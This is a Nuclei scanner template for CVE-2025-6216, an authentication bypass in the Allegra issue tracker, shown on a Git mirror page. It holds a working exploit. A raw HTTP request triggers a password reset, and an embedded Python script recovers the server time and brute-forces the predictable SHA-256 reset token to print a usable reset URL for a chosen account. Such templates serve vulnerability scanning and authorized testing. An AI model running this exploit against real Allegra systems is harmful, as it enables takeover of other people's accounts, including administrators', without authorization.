admin/nuclei-templates
1
0
Fork 0
mirror of https://github.com/projectdiscovery/nuclei-templates.git synced 2026-01-31 15:53:33 +08:00
Code Issues Packages Projects Releases Wiki Activity
Files
f75d4e8f37122151784556557f4830d455fd7437
nuclei-templates/code/cves/2025/CVE-2025-6216.yaml
ghost f75d4e8f37 chore: sign templates 🤖
2026-01-18 07:01:37 +00:00

118 lines
4.4 KiB
YAML
Raw Blame History

id: CVE-2025-6216
info:
name: Allegra - Authentication Bypass via Predictable Password Reset Token
author: iamnoooob,pdresearch
severity: critical
description: |
Allegra calculateTokenExpDate Password Recovery Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of Allegra. Authentication is not required to exploit this vulnerability. The specific flaw exists within the password recovery mechanism. The issue results from reliance upon a predictable value when generating a password reset token. An attacker can leverage this vulnerability to bypass authentication on the application.
impact: |
An attacker can exploit this vulnerability to bypass authentication and gain unauthorized access to the application, potentially compromising sensitive data and system integrity.
remediation: |
Upgrade Allegra to version 8.1.4 or 7.5.2 or later to fix the predictable password reset token vulnerability.
reference:
- https://www.zerodayinitiative.com/advisories/ZDI-25-410/
- https://alltena.com/en/resources/release-notes/release-notes-for-release-8-1-4-and-release-7-5-2
- https://nvd.nist.gov/vuln/detail/CVE-2025-6216
classification:
epss-score: 0.33256
epss-percentile: 0.96772
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-6216
cwe-id: CWE-640
cpe: cpe:2.3:a:alltena:allegra:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: alltena
product: allegra
shodan-query: http.favicon.hash:"284403119"
fofa-query: icon_hash="284403119"
tags: cve,cve2025,allegra,auth-bypass,predictable-token,reset,vuln
variables:
email: "admin@mydomainxxx.com" # Change to a test account
flow: http(1) && code()
http:
- raw:
- |
POST /resetPassword.action HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
email={{email}}&fromAjax=true&_dc=1750669432104&perspectiveType=&appActionID=
extractors:
- type: regex
name: date_header
part: header
internal: true
group: 1
regex:
- "Date: (.*)"
matchers-condition: and
matchers:
- type: word
words:
- "emailSent"
- '"success":true'
condition: and
- type: status
status:
- 200
code:
- engine:
- py
- python3 # requires python to be pre-installed on system running nuclei
source: |
import requests
import hashlib,os
import time
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime
def get_server_time(response):
date_header = response.headers.get('Date')
if date_header:
return parsedate_to_datetime(date_header)
return None
def main():
BASE_URL = os.getenv("BaseURL")
EMAIL = os.getenv("email")
date_header = os.getenv("date_header")
server_time = parsedate_to_datetime(date_header)
if not server_time:
return
server_time_ms = int(server_time.timestamp() * 1000)
expiry_time_ms = server_time_ms + 28800000
base_expiry_sec = (expiry_time_ms // 1000) * 1000
for ms in range(1000):
candidate_expiry_ms = base_expiry_sec + ms
token = hashlib.sha256(str(candidate_expiry_ms).encode()).hexdigest()
test_url = f"{BASE_URL}/resetPassword!confirm.action?ctk={token}"
r = requests.get(test_url, allow_redirects=False)
if 'com.trackplus.app.logon.ResetPasswordApplication' in r.text:
print(test_url)
return
if __name__ == "__main__":
main()
matchers:
- type: dsl
dsl:
- contains(code_response, "/resetPassword!confirm.action?ctk=")
extractors:
- type: dsl # type of the extractor
dsl:
- '"Reset URL: " + code_response'
# digest: 4a0a0047304502205b86c22a3fb0af7237a2f8686e8cf1cf5e7f52eed02f14c7a1cb625b8a6cbe96022100c0138082e3a49f64d3608d2d2d48676ba8a4a813d67abaff576f37625a5aa904:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink